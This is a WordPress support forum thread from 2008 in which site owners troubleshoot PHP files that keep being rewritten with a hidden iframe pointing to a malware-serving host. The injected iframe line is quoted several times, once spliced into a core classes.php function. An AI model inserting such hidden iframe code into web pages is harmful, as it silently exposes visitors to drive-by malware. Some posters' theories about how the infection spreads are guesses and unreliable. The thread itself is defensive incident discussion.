Files in wp-includes keep changing

  • coalminecanary

    (@coalminecanary)


    15 years, 11 months ago

    Twice now, I have gone to my wordpress install and found that it is throwing PHP errors. I only installed this on the 27th of april, and now on the 3rd day I’m having this happen for a second time.

    My host assures me there was no activity on their server that could have corrupted these files.

    All of the files in wp-includes appear to have new timestamps when this happens, but all other files on the server are fine. If I re-upload the original files form the release package, everything works again.

    For now I have left it in error state at http://www.amykenny.ca in case you want to see the errors.

    Is there anything within wp that could be trying to write info into these files? I’d suspect hacking except there have been no problems with any other fiels ever on my server, just this one directory over the last 2 days…

    Thanks!

Viewing 15 replies - 1 through 15 (of 17 total)
1 2
  • whooami

    (@whooami)

    15 years, 11 months ago

    All of the files in wp-includes appear to have new timestamps when this happens …

    Is there anything within wp that could be trying to write info into these files?

    No.

    Did you look at the source of that page?

    You might want to. See that iframe?

    <iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>?>

    hemasunder

    (@hemasunder)

    15 years, 11 months ago

    <iframe src=”http://apartment-mall.cn/ind.php&#8221; width=”1″ height=”1″ alt=”YTREWQhej2Htyu” style=”visibility:hidden;position:absolute”></iframe>?>

    this is the problem, what is the solution for that

    Thread Starter coalminecanary

    (@coalminecanary)

    15 years, 11 months ago

    Interesting.

    So on my webserver, the end of classes.php looks like this:

    function send() {
		header('Content-Type: text/xml');
		echo "<?xml version='1.0' standalone='yes'
echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';
?>		foreach ( $this->responses as $response )
			echo $response;
		echo '</wp_ajax>';
		die();
	}
}

?>
?>
?>

    And my local copy is:

    function send() {
		header('Content-Type: text/xml');
		echo "<?xml version='1.0' standalone='yes'?><wp_ajax>";
		foreach ( $this->responses as $response )
			echo $response;
		echo '</wp_ajax>';
		die();
	}
}

?>

    So, is there something in WP that could allow external access to wp-includes folder? This definitely appears to be bot-like… search and replace of header text…

    I will check with ISP as well.

    Thanks!

    dondakaya

    (@dondakaya)

    15 years, 11 months ago

    My website’s php files were also modified to include this line on 29 apr 08 at 22:55 pm (godaddy server time). So its not only the prob with word press. I think this is new kind of virus spreadin around.

    If you observe it, it adds the link to the last line of the first PHP block it encounters.

    dondakaya

    (@dondakaya)

    15 years, 11 months ago

    coolmine > at first we can consider this as a hack only on godaddy servers.

    hemasunder > just replace the files. right now that is the only solution i can see.

    Thread Starter coalminecanary

    (@coalminecanary)

    15 years, 11 months ago

    For the record, My host is dreamhost.

    Was this happening on all of your php files? Or just certain directories? just wordpress files?

    dondakaya

    (@dondakaya)

    15 years, 11 months ago

    it was only for certain dirs and files, not all. dirs like.. scripts, core. files like contact.php, search.php, login.php. FYI, i dont have any word press files in my website. I am posting here because of the http://apartment-mall.cn/ind.php problem.

    Thread Starter coalminecanary

    (@coalminecanary)

    15 years, 11 months ago

    This is only happening to my wordpress includes directory. I have lots of other PHp files on the server under the same ftp login. wp-includes only has write access by owner, I double checked that…

    sanmarco

    (@sanmarco)

    15 years, 11 months ago

    hi, I had the same problem, the hack by apartment-mall. Its only affecting all php and all html files. I delete them one time than they got rewritten! The safe way to do it. Dont ope your website where the hack messed everything up because it will put an load.exe on your desktop. If you than try to delete all php and html files this application rewrite it. I had this problem. Went to another pc, use the ftp programm to delete the php and html files or just overwrite them with the clean ones from my back up. Now its ok. Make sure you check all your directories!! Also may check your chmod status, if it is on 777 so thats may the loophole where the hack goes in and mess everything up. My chmod was on 777.

    Yes its alwys only writing the i-frame thing below in the last row!
    sanmarco

    sanmarco

    (@sanmarco)

    15 years, 11 months ago

    I forgot, it was not only attacking my wordpress files, also my textpattern files I use now mostly. But I guess the wordpress files I still had on my host went the entrance for the hack. Because I check in textpattern forums and there was not postings about his hack yet.

    Thread Starter coalminecanary

    (@coalminecanary)

    15 years, 11 months ago

    So wait, this is a program ON the webserver that caused it for you?

    Or a program on the computer with which you FTP into the webserver?

    THanks!

    sanmarco

    (@sanmarco)

    15 years, 11 months ago

    I guess its a programm on the computer. It is a programm downloaded when it links and open to this apartment-mall website. I try two pc in a internetcafe, both time it downloaded a so calling “load.exe” from aparment-mall.cn onto the destop. This happened in the background during the browser try to open my website. At the third pc than I avoided to open my infected website. It was working sucessful when i deleted the files with my ftp programm. I used a ftp programm working from a memory stick. But also I deleted all the wordpress tables in my database to make sure there is nothing stored too. Because i was not sure. They went useless anyway as i use now textpattern.
    My guess is that this load.exe “knows” when you enter per ftp into your webspace. As soon you delete or rewrite the files it rewrites it again.
    I was also not able to delete this load.exe from the desktop or drag it into the recycle bin. Therefore my theorie that its the programm ON the computer. Hope this info can help you guys.

    Sanmarco

    dondakaya

    (@dondakaya)

    15 years, 11 months ago

    Upon testing the infected scripts on IE7, the ind.php actually tries to install an active x control on IE, disguised in the name of microsoft.

    if you have avast antivirus, you can block the website, so browser will not download any thing from that website. later, replace the files in the ftp. i think this is new virus so it will take some time to write antivirus.

    dondakaya

    (@dondakaya)

    15 years, 11 months ago

    this link might be useful – http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

    the article is big, but read it to know it. it says that its the mpack server that does all this.

    Thread Starter coalminecanary

    (@coalminecanary)

    15 years, 11 months ago

    Hm

    So what I am wondering is HOW these php files are getting writen over?

    When I replace them with FTP, the site works for some time.

    THen later on, the site is broken and all of the wp-includes failes have been edited by whatever script.

    My site is hosted remotely by dreamhost in a unix based server. my guess is that the bot is accessing these files through some sort of exploit

    wordpress is the ONLY thing installed on this website!

Viewing 15 replies - 1 through 15 (of 17 total)
1 2
  • The topic ‘Files in wp-includes keep changing’ is closed to new replies.